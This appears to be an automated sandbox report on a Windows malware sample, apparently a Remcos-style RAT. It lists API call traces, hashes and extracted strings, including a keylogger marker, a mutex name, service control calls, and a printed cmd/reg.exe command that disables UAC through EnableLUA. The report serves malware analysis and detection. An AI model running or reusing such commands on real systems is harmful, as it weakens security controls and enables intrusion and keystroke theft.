• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered$`Wu
• API String ID: 614609389-1738255680
• Opcode ID: 021d9ec2cd6305426b6f5a59cdde20efeace4cbfb6cfd33714795c6fea8599ad
• Instruction ID: 3eb53b128005a95a8b223a36a170621c1ff24ca90ee0cec75b81ae9db2c9f7f4
• Opcode Fuzzy Hash: 021d9ec2cd6305426b6f5a59cdde20efeace4cbfb6cfd33714795c6fea8599ad
• Instruction Fuzzy Hash: E5E04836F62134379620377A9D4ECBF3D2DDAC2660741055DFD0756145DE102815C7F2
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1569179C: SetLastError.KERNEL32(0000000D,15691D1C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15691CFA), ref: 156917A2
• SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15691CFA), ref: 15691D37
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,15691CFA), ref: 15691DA5
• SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 15691DC9
  • Part of subcall function 15691CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,15691DE7,?,00000000,00003000,00000040,00000000,?,00000000), ref: 15691CB3
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 15691E10
• HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 15691E17
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 15691F2A
  • Part of subcall function 15692077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,15691F37,?,?,?,?,00000000), ref: 156920E7
  • Part of subcall function 15692077: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 156920EE
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
• String ID:
• API String ID: 3950776272-0
• Opcode ID: c736b78091e5c656e2a7b21210db5939c2463bff69c940cbc8f2a0e9e9a0f895
• Instruction ID: a989928c68e342ce339268b52603bf7d4acc19f15a1c589ccf2b438f37594bd0
• Opcode Fuzzy Hash: c736b78091e5c656e2a7b21210db5939c2463bff69c940cbc8f2a0e9e9a0f895
• Instruction Fuzzy Hash: 6B611174B05616EFD7089F25C980B2A7BEABF84350F20411DEC068BB81EB74E846CBD1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: ec9dea24fe271a94d20e120a8acb520807e819e3b5acf82b3ff013990e21c496
• Instruction ID: f4bc40baeb4fe99ff9cd19ceefa7bc5e5daf37b4a519833922c91c95b0fbc5d0
• Opcode Fuzzy Hash: ec9dea24fe271a94d20e120a8acb520807e819e3b5acf82b3ff013990e21c496
• Instruction Fuzzy Hash: FB51FD36A05245ABDB10CBA9CC80F9E77E9FF59331F1042DAE41696291DF35F900CAE8
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00001388), ref: 1568A740
  • Part of subcall function 1568A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,1568A74D), ref: 1568A6AB
  • Part of subcall function 1568A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,1568A74D), ref: 1568A6BA
  • Part of subcall function 1568A675: Sleep.KERNEL32(00002710,?,?,?,1568A74D), ref: 1568A6E7
  • Part of subcall function 1568A675: CloseHandle.KERNEL32(00000000,?,?,?,1568A74D), ref: 1568A6EE
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 1568A77C
• GetFileAttributesW.KERNEL32(00000000), ref: 1568A78D
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 1568A7A4
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 1568A81E
  • Part of subcall function 1569C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,156E6468,00000000,00000000,00000000), ref: 1568A927
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID:
• API String ID: 3795512280-0
• Opcode ID: 0120a033857e4422fca1e40a4f8cc03a4462c880ffcb2b25262d21eeb84b1bbb
• Instruction ID: 26b16f556f9a7af05be4346cfc4549df3342cddcf03c1c7b0966f10a1aec976d
• Opcode Fuzzy Hash: 0120a033857e4422fca1e40a4f8cc03a4462c880ffcb2b25262d21eeb84b1bbb
• Instruction Fuzzy Hash: 0851847970A3049BDB08EB30C864ABE77AA5F94214F44091DE993972D0DF74BD09C7E9
Uniqueness

Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DEE5E1
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DEE5FD
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02DEE636
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DEE6B3
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02DEE6CC
• VariantCopy.OLEAUT32(?,00000000), ref: 02DEE701
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction ID: 683e95ca6208846ea4f9c9d88d60dcca018203ad0038c7f5c4952f8d136ccfde
• Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction Fuzzy Hash: 0851E7B59006299BCF22EB58C880BD9B3BEEF49310F0045D5E90AA7351DB71AF85CF65
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16_free
• String ID: a/p$am/pm
• API String ID: 2936374016-3206640213
• Opcode ID: 20b997a149a10720fdfd5c21282df33c2ec8be3001a03c66cb13c6e02d2b68e1
• Instruction ID: 944334307d015f0cc2dd8c73b62d00eb20b14bf6b9f92a898deaa0c0c9db6ab0
• Opcode Fuzzy Hash: 20b997a149a10720fdfd5c21282df33c2ec8be3001a03c66cb13c6e02d2b68e1
• Instruction Fuzzy Hash: B2D1D135E0420ACADB15CF68C891BAAB7B5FF05310F1041DEE946AFA54D33DA980CBE1
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 15690E6E
• int.LIBCPMT ref: 15690E81
  • Part of subcall function 1568E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 1568E0D2
  • Part of subcall function 1568E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 1568E0EC
• std::_Facet_Register.LIBCPMT ref: 15690EC1
• std::_Lockit::~_Lockit.LIBCPMT ref: 15690ECA
• __CxxThrowException@8.LIBVCRUNTIME ref: 15690EE8
• __Init_thread_footer.LIBCMT ref: 15690F29
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
• String ID:
• API String ID: 3815856325-0
• Opcode ID: 05f2795c7f2f91c60c6eea06ad47a782f9d886e8b942461cdc594ad1c927bffd
• Instruction ID: eda00c7fc2757e4f52d14b0b7dbe9d80bc60d9ce21a40508b0481a15eba84e71
• Opcode Fuzzy Hash: 05f2795c7f2f91c60c6eea06ad47a782f9d886e8b942461cdc594ad1c927bffd
• Instruction Fuzzy Hash: CA21C63AF161149FCB05DB78D8A5C9D77B9AF44230B60025BE451A7280EF71BE41C7D9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
• _free.LIBCMT ref: 156C824C
• _free.LIBCMT ref: 156C8274
• SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8281
• SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
• _abort.LIBCMT ref: 156C8293
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: a2cd68d45d119d72659a7ce3ce041dbcca702d3339b2d9c3f2c94b61231893e1
• Instruction ID: 6d6ff60a384005da27db517235797354906932f25c81e1491ce149f9ffad6827
• Opcode Fuzzy Hash: a2cd68d45d119d72659a7ce3ce041dbcca702d3339b2d9c3f2c94b61231893e1
• Instruction Fuzzy Hash: 30F0F93A605A506BC37162285C98F5B251EDFC3271F25069EF865A2680EF34B801C1E8
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC20
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC34
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC41
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC50
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC62
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC65
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
                                                                                                                                                    • Opcode ID: e5c36e42f113ff8bc7ef25224b6b77883a924020c74d19f158b4960a69142924
                                                                                                                                                    • Instruction ID: bedf5223065262c9987675bf661c57df8aea886ede50f78ac263985301efcb32
                                                                                                                                                    • Opcode Fuzzy Hash: e5c36e42f113ff8bc7ef25224b6b77883a924020c74d19f158b4960a69142924
                                                                                                                                                    • Instruction Fuzzy Hash: 0BF0CD7561122CAFD710AB24AC88EBF3BACDB46261F00001DFE48E6240EF749E05CAE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fu56fbrtn8.exe,00000104), ref: 156C3475
                                                                                                                                                    • _free.LIBCMT ref: 156C3540
                                                                                                                                                    • _free.LIBCMT ref: 156C354A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$p&y
                                                                                                                                                    • API String ID: 2506810119-711275088
                                                                                                                                                    • Opcode ID: c43d0c04aa5512b46ba6b251d961c559ad94adc0c80cd53c8f79ebe81ae9bf29
                                                                                                                                                    • Instruction ID: 74444ab90d9f5bab61640ac220ae92d55ff4dbacb784d02fea57a9062b2e225f
                                                                                                                                                    • Opcode Fuzzy Hash: c43d0c04aa5512b46ba6b251d961c559ad94adc0c80cd53c8f79ebe81ae9bf29
                                                                                                                                                    • Instruction Fuzzy Hash: 263180B5F05258AFDB22DF99DD84D9EBBBCEB85311B5041DBE40497210DA70AB40CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,156F50E4), ref: 1569363D
                                                                                                                                                      • Part of subcall function 1569361B: RegQueryValueExW.ADVAPI32(?,1568F313,00000000,00000000,?,00000400), ref: 1569365C
                                                                                                                                                      • Part of subcall function 1569361B: RegCloseKey.ADVAPI32(?), ref: 15693665
                                                                                                                                                      • Part of subcall function 1569BFB7: GetCurrentProcess.KERNEL32(?,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFC8
                                                                                                                                                      • Part of subcall function 1569BFB7: IsWow64Process.KERNEL32(00000000,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFCF
                                                                                                                                                    • _wcslen.LIBCMT ref: 1569B763
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                    • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                    • API String ID: 3286818993-4246244872
                                                                                                                                                    • Opcode ID: 73ac7016c947025d2f093784df4ea570aa2bec1b8354b9c9126fffed41dce4e8
                                                                                                                                                    • Instruction ID: 808e4d3b0e080b53f053da9cc8ecb27f51bab3faa9afe2ecc74eb0b178457ae9
                                                                                                                                                    • Opcode Fuzzy Hash: 73ac7016c947025d2f093784df4ea570aa2bec1b8354b9c9126fffed41dce4e8
                                                                                                                                                    • Instruction Fuzzy Hash: C721867AB062046BDB18EAB48C959AE77ADDB45120B44053DE406A7290EE24BD09C3E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                    • wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                      • Part of subcall function 1568A636: SetEvent.KERNEL32(00000000,?,00000000,1568B20A,00000000), ref: 1568A662
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                                                    • Opcode ID: bc22cf2ed6e595287bf2462af30df796f6da5d71e2e66ee425e62748b7258694
                                                                                                                                                    • Instruction ID: 3984b3615f81e3d90f05e2e6f00824f97841e3801ad4b1ba79d1d46735ba9446
                                                                                                                                                    • Opcode Fuzzy Hash: bc22cf2ed6e595287bf2462af30df796f6da5d71e2e66ee425e62748b7258694
                                                                                                                                                    • Instruction Fuzzy Hash: C111367A615118AACB18DB94EC548FE77FDEE48261B00011EF44696190FF78BE85C7EC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 1569D55B
                                                                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 1569D576
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569D580
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                                                                    • Opcode ID: ce814d2d095d7595f885d1c7201aeaa8d1ce721d7855f83de2b5a775bb404f24
                                                                                                                                                    • Instruction ID: 1f00d6e8a543e1336fd118016bb3b81b4a93dba4f9b495de7e34a4a176562f5e
                                                                                                                                                    • Opcode Fuzzy Hash: ce814d2d095d7595f885d1c7201aeaa8d1ce721d7855f83de2b5a775bb404f24
                                                                                                                                                    • Instruction Fuzzy Hash: 1601D7B191121DAFDB00DFD5DCC49EFBBBDFA04294B40052AF911A6240EB7159058BE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE357E
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35B1
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,02DE35D4,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                    • Opcode ID: 4b0b3e02a2b12ce1148d289d8dc1f20f50a31b1017abe53721f60084c72dd486
                                                                                                                                                    • Instruction ID: 20ec4cb9067470a4a1e4ecb16ee63d21d44afa12a25be599d1604c25b240688d
                                                                                                                                                    • Opcode Fuzzy Hash: 4b0b3e02a2b12ce1148d289d8dc1f20f50a31b1017abe53721f60084c72dd486
                                                                                                                                                    • Instruction Fuzzy Hash: 2001B575A40248BAEF11EB919C42FBEB3ECEB08700F5045A5BA05D7780E6759E54CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 1568779B
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 156877AA
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 156877AF
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 15687796
                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 15687791
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                    • Opcode ID: 9904cd65c2cc293f009faa74cb7f8d4bc9e4a6944c59535d9ce333c9ea81829b
                                                                                                                                                    • Instruction ID: 234e6bfe6c7e8678221b7e18e02ac9bd23d5784efcc19579d773e7eda3856851
                                                                                                                                                    • Opcode Fuzzy Hash: 9904cd65c2cc293f009faa74cb7f8d4bc9e4a6944c59535d9ce333c9ea81829b
                                                                                                                                                    • Instruction Fuzzy Hash: BCF01D76D011AC7ACB20AAD69C49EDF7F7DEBC5B21F00056AFA08A6140DA717404CBF4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\Desktop\fu56fbrtn8.exe, xrefs: 156876C4
                                                                                                                                                    • Rmc-VLI916, xrefs: 156876DA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$Rmc-VLI916
                                                                                                                                                    • API String ID: 0-3200063905
                                                                                                                                                    • Opcode ID: 65a2d1ab578bb930dbf81a5846d0daf6dc364b078ec8027065781ba69882e9b0
                                                                                                                                                    • Instruction ID: 042c4356ed6b107a09223d150a67d2c0f54d8803f29c4e12496fab477be5a47d
                                                                                                                                                    • Opcode Fuzzy Hash: 65a2d1ab578bb930dbf81a5846d0daf6dc364b078ec8027065781ba69882e9b0
                                                                                                                                                    • Instruction Fuzzy Hash: 76F0F630F22365DBCB045B248878B1C3A6BB741656F84081AE842CA684DF3A18D0C7D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,156C32EB,00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002), ref: 156C335A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 156C336D
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,156C32EB,00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002), ref: 156C3390
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                    • Opcode ID: b01900826af76f305ed7b3d9d32b972b1196a4377f8be8d144e9a3f9472bf7d7
                                                                                                                                                    • Instruction ID: 6fbaf24d57046dde38b6959e89230784b977a5163f218d290c1d5375ec6476f1
                                                                                                                                                    • Opcode Fuzzy Hash: b01900826af76f305ed7b3d9d32b972b1196a4377f8be8d144e9a3f9472bf7d7
